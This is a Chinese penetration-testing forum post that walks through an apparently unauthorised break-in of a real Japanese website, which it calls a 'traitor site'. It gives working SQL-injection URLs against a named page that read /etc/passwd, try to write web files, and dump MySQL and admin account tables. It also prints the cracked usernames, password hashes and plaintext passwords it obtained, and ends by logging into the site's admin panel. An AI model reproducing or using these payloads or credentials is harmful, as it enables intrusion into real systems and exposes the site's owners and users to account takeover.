中国网络渗透测试联盟

标题: 原创 检测汉奸站全过程 [打印本页]

作者: xiancda    时间: 2012-9-17 16:22
标题: 原创 检测汉奸站全过程
补:www.zuaa.jp测试

$ i5 c# a+ ~3 q8 I: Y7 J7 ?+ T) m$ \+ H  o
0x01. 检测 www.zuaa.jp 收集数据, c5 |0 d& W/ |+ F/ q& f  `
[attach]73[/attach]/ D" I) r( m$ }- s

: p: T5 e- t9 ~/ g9 v+ O6 Bwhatweb+ p$ U2 q5 s$ z
[attach]74[/attach]& W: M6 B9 m; t+ p* h
9 Z6 o" k' p8 N8 J1 X% |
利用NMAP扫描
. T3 Q  X+ S9 I8 p) a( u) M[attach]75[/attach]
1 e2 H( u7 M7 J# x2 f* h中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
/ H; @" H, I# L8 ?$ s0x02.找注入点
% K- a/ |8 A" D& X% q找注入点:http://www.zuaa.jp/php/newsdetail.php?topic_id=390- s3 H. U% e) n" _  W2 t$ V
[attach]76[/attach]. u: k- I6 z6 @! b- f
- L+ ^! j; D% P; [: V: U
0x03.order by$ V' n0 v5 y# s: b& b
             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 19 v0 N% d  W4 j7 }# Q% A
[attach]77[/attach]; E0 _2 G# A( n" g% B& V
order by 28报错,order by 27正常
3 T9 f5 U1 J# T0 m& t6 T3 k
! |7 c& o7 C; Q) K4 }7 C# o$ x# F0x04.   union手动查询1 v, S. Q; k- ^6 |8 J
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ( n- H1 Y4 ~& L8 u- ?8 F$ h
添加到 27 时正常显示
0 y) G. l% n  V" ~! R- R* I$ ^[attach]78[/attach]
# C- L3 Y6 w2 w6 w+ [( J" j! R% H中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持/ L% A7 z4 N6 I  S( _/ \- i3 c

8 ]6 g% a$ {. r6 Y$ K/ e0x05. info:
/ H  V  L" {" d5 r% Lhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
  h- B4 K* z+ c3 Y6 |[attach]79[/attach]9 ]5 s( O; ~) W
user:            root@localhost& l, d: y/ L4 K) _- z
database:    openpne2 {6 i4 I  p3 w8 |  h5 n% _
version:      4.1.22( x+ e6 j3 U& G; n* T
os:             portbld-freebsd5.4/ J' g8 @: |) F8 K/ k

5 _2 L7 n! [4 M$ i* E& d' _7 K0x06. root用户
& b- `) Q$ g! p! N9 A1 q3 _  Q0 s利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)6 P! H2 ]! z6 U) H+ T) P/ o* c7 t# m
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 , _6 c2 J" Z# M8 H9 i. Y8 K& y
[attach]80[/attach]
! T# l* P% g- ~. ]通过工具转换) ~& H$ O+ D& [
[attach]81[/attach]+ E; W% o; d! \: P- h
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
0 s6 b) _/ r3 Z7 g4 Z2 u
+ ~$ E5 ^5 K$ a4 f0x07. 利用 into outfile" F5 y2 b4 O' b$ K3 i- Z
全部都失败4 }) c# e  J7 g: f, L
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php9 O- g: e" s/ e
% e, w+ q( n8 j" J( Z5 p
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php 9 g3 n) [. e. i+ w0 f0 s
! p! F) _) N3 b5 f$ t8 `
页面显示“MDB2 Error:syntax error”* G! J# R; K3 Z9 w5 a

4 A7 |& f$ D; _+ h0 t3 f! U0x08. 利用 mysql 4.1+ I0 X; D; B3 e% f, I# m
猜常规表名,字段未果 工具 sqlmap  t) Y  N0 @( v+ T3 m  x$ O
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持  z" K8 y5 i7 ~# g

1 Y3 e" k0 L5 [5 \$ r[attach]82[/attach]/ d6 r9 w5 x' U& M2 D- l; }0 c

3 U+ I# A- W" D. d, ~% W0x09. 查找后台, m% P- K0 i/ }2 [8 R# G
利用 现有的各种 后台工具尝试都不行
5 R- R. P! ?) f$ I( v) @. ~, |: A+ t' g. Z0 m0 h$ F5 ], F6 O
0x10.  MySL外联方法, N7 N  ?8 s5 z* C
从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连 www.zuaa.jp 不行1 x9 K! {! c+ u! z# ]6 I. o
可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
4 F$ C6 i) d' h$ ^$ a, jhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user
0 O! p; A: i/ b[attach]83[/attach]
9 ~: C- o0 n% g. |( b) v3 M& k这个可以在 www.cmd5.com 解密
9 {+ M3 {) S- ^6 Jroot:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa20091 n6 e# M. t! u. ^% q
chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
# u& r- B  k) r4 w/ k  Uopenpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???* J  m! N6 n. i
zuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
% P0 v; l# J) L$ l. W2 K/ L工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知
; G; m. b% a: n[attach]84[/attach]
* ~" m0 ?0 `- f: K% l1 B4 t+ A& C0 H. o) b( U: E) d; p. @6 U% X
0x11. 网站突破$ X4 ^7 Y: V- ~, [0 g8 T
发现网站的源程序 openpne, google 下载 openpne 源码
: o5 d3 @7 A& o$ k  J+ S[attach]85[/attach]
" ]( }% W, }) c1 ?. `& ?% G2 L7 x
0x12. 默认信息利用+ W; K( ?8 K( b/ y; K2 W
http://sns.zuaa.jp/?m=admin&a=page_login% r0 W% q9 ]5 P+ Y( H" V, |
[attach]86[/attach]0 B) X4 _" n5 ^' y! d. J$ Z
表名 (c_admin_user) ,字段名(username,password)
  q/ c2 s( Y8 A5 w( ^: _http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user
; T: I; X, h; t3 E. ]$ w# o[attach]87[/attach]) ?2 T) R! f* s+ Z2 K' `: c
解密% _3 H7 x$ [2 s: S# M0 l
zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa20090 F! }$ u) C3 ]: O& `) B) D2 c
zuaajp:c0923ec5857796a393da99905008c176,          zju1897* i7 g% _: }. V* A/ ~! G
1 ]6 p$ L2 Z- ?! w" |6 `3 \' w
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
! l4 W- b- R' I6 e# W' D
2 R( c- ^4 _$ R# y) p- M0x13. 登录后台
- x7 z4 l0 z- o: i5 j' E# f3 I[attach]88[/attach]0 ?) A, N( T1 ^
/ ?7 j4 u6 N& \4 P7 ?1 ]9 J9 w
- _9 j9 |& f- x8 ^
0x14. 小结7 X" @0 m! M5 k
利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。1 O. Q0 q# [; J3 q
感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点) S0 k/ ~& g: U$ }3 w
------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain
! L4 Z# @8 Y; o% _3 u6 Z/ W/ t+ F* M中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
/ R/ Z5 z" A  q- W+ n/ v5 n6 i! I- n
最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!
) {  s3 J: W0 v$ L# n* d
作者: 荒村狂客    时间: 2012-9-19 08:27
哪个牛人 费的这劲 入侵的




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2